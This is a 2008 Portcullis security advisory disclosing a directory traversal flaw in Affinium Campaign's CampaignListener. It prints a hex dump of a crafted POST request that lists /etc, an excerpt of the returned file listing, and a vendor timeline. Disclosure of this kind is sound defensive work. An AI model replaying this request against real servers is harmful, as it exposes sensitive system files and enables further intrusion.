Tried, Tested and Proven

Security Advisory 08-006 – Affinium Campaign’s Listener is vulnerable to directory traversal

Vulnerability Title:

The Listener is vulnerable to directory traversal.

Vulnerable System:

Affinium Campaign

Vulnerability discovery and development:

Portcullis Security Testing Services

Credit for Discovery:

Tim Brown – Portcullis Computer Security Ltd.

Affected Systems:

All known versions of Affinium Campaign; the vulnerability discovered was for version 7.2.1.0.55.

Details:

It is possible for an attacker to traverse the directory structure and break out of the application imposed sandbox by manipulating requests from the web application’s ActiveX control which encapsulates binary data within a HTTP POST request to https://webserver/Campaign/CampaignListener. Since the CampaignListener web page is expecting binary data, no attempt to validate the input is made prior to passing it to the listener server. For example:

00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 31 20 48 54 54 50 2f |ClientID=1 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 55 6e |rver..Cookie: Un|
00000050 69 63 61 44 65 66 61 75 6c 74 43 61 74 61 6c 6f |icaDefaultCatalo|
00000060 67 3d 44 52 5f 54 65 73 74 2e 63 61 74 3b 20 43 |g=DR_Test.cat; C|
00000070 41 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 |AMPAIGNSESSIONID|
00000080 3d 48 41 5a 51 74 36 50 6c 6b 56 38 34 4c 62 32 |=HAZQt6PlkV84Lb2|
00000090 70 46 53 37 58 77 4d 6d 62 4c 41 31 76 4d 6e 74 |pFS7XwMmbLA1vMnt|
000000a0 6e 50 38 6d 4c 47 41 68 31 47 79 59 43 76 30 6e |nP8mLGAh1GyYCv0n|
000000b0 44 37 79 6b 34 21 37 30 37 36 33 30 32 33 39 0d |D7yk4!707630239.|
000000c0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a |.Content-Length:|
000000d0 20 32 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 | 229..Content-Ty|
000000e0 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f |pe: multipart/fo|
000000f0 72 6d 2d 64 61 74 61 0d 0a 0d 0a e1 00 00 00 01 |rm-data....á....|
00000100 00 02 07 08 00 00 00 01 01 00 00 00 12 00 00 00 |................|
00000110 0d 01 00 00 00 00 01 01 00 00 00 01 00 00 00 01 |................|
00000120 01 00 00 00 17 00 00 00 12 09 00 00 00 53 46 69 |.............SFi|
00000130 6c 65 53 79 73 00 01 01 00 00 00 01 00 00 00 04 |leSys...........|
00000140 97 00 00 00 00 00 00 00 42 00 00 00 00 00 46 00 |........B.....F.|
00000150 00 00 2f 65 74 63 00 00 00 00 00 00 00 00 00 00 |../etc..........|
00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000190 00 00 00 00 00 00 00 00 00 3c 00 00 00 2f 61 70 |.........<.../ap|
000001a0 70 73 2f 75 6e 69 63 61 2f 61 66 66 69 6e 69 75 |ps/unica/affiniu|
000001b0 6d 2f 41 66 66 69 6e 69 75 6d 2f 43 61 6d 70 61 |m/Affinium/Campa|
000001c0 69 67 6e 2f 70 61 72 74 69 74 69 6f 6e 73 2f 70 |ign/partitions/p|
000001d0 61 72 74 69 74 69 6f 6e 31 00 42 00 00 00 00 00 |artition1.B.....|
000001e0 0d 0a |..|

Results in the following being returned;

… snipped for brevity …

00001200 00 00 01 00 00 00 41 41 06 00 00 00 70 61 73 73 |......AA....pass|
00001210 77 64 00 fb 66 60 c9 14 09 00 00 00 00 00 00 01 |wd.ûf`É.........|
00001220 00 00 00 41 41 04 00 00 00 70 69 6e 67 00 d7 8c |...AA....ping.×.|
00001230 92 c5 82 7d 00 00 00 00 00 00 01 00 00 00 41 41 |.Å.}..........AA|
00001240 0c 00 00 00 70 6f 6c 69 63 79 64 2e 63 6f 6e 66 |....policyd.conf|
00001250 00 8a 46 3a c5 b0 08 00 00 00 00 00 00 01 00 00 |..F:Å°..........|
00001260 00 41 41 0d 00 00 00 70 72 65 73 65 72 76 65 2e |.AA....preserve.|
00001270 6c 69 73 74 00 6f 47 3a c5 c4 04 00 00 00 00 00 |list.oG:ÅÄ......|
00001280 00 01 00 00 00 41 41 07 00 00 00 70 72 6f 66 69 |.....AA....profi|
00001290 6c 65 00 45 c7 d8 c5 d8 0f 00 00 00 00 00 00 01 |le.EÇØÅØ........|
000012a0 00 00 00 41 41 0b 00 00 00 70 72 6f 66 69 6c 65 |...AA....profile|
000012b0 2e 61 77 73 00 6f 6c c4 c5 58 02 00 00 00 00 00 |.aws.olÄÅX......|
000012c0 00 01 00 00 00 41 41 0d 00 00 00 70 72 6f 66 69 |.....AA....profi|
000012d0 6c 65 2e 62 61 6b 75 70 00 0b 6f 44 c5 7f 09 00 |le.bakup..oDÅ...|
000012e0 00 00 00 00 00 01 00 00 00 41 41 0b 00 00 00 70 |.........AA....p|
000012f0 72 6f 66 69 6c 65 2e 75 6e 69 00 5a 71 c4 c5 be |rofile.uni.ZqÄž|
00001300 01 00 00 00 00 00 00 01 00 00 00 41 41 09 00 00 |...........AA...|
00001310 00 70 72 6f 74 6f 63 6f 6c 73 00 8a 46 3a c5 ba |.protocols..F:ź|
00001320 26 00 00 00 00 00 00 01 00 00 00 41 41 08 00 00 |&..........AA...|
00001330 00 70 73 65 2e 63 6f 6e 66 00 df 44 3a c5 fc 0c |.pse.conf.ßD:Åü.|
00001340 00 00 00 00 00 00 01 00 00 00 41 41 0d 00 00 00 |..........AA....|
00001350 70 73 65 5f 74 75 6e 65 2e 63 6f 6e 66 00 df 44 |pse_tune.conf.ßD|

… snipped for brevity …

Impact:

An attacker would be able to use this to list files in sensitive locations. Whilst it was not conclusively proven, it may also be possible to execute map existing files such as /etc/passwd to Affinumum Campaign tables and execute arbitrary commands by the further manipulation of requests from the ActiveX control to the CampaignListener web page.

Exploit:

Exploit code is not required.

Vendor Status:

05/06/2008 – vendor informed

10/06/2008 – Vendor updated

11/06/2008 – Vendor responded via email

16/07/2008 – Vendor confirmed patches

Copyright:

Copyright © Portcullis Computer Security Limited 2008, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.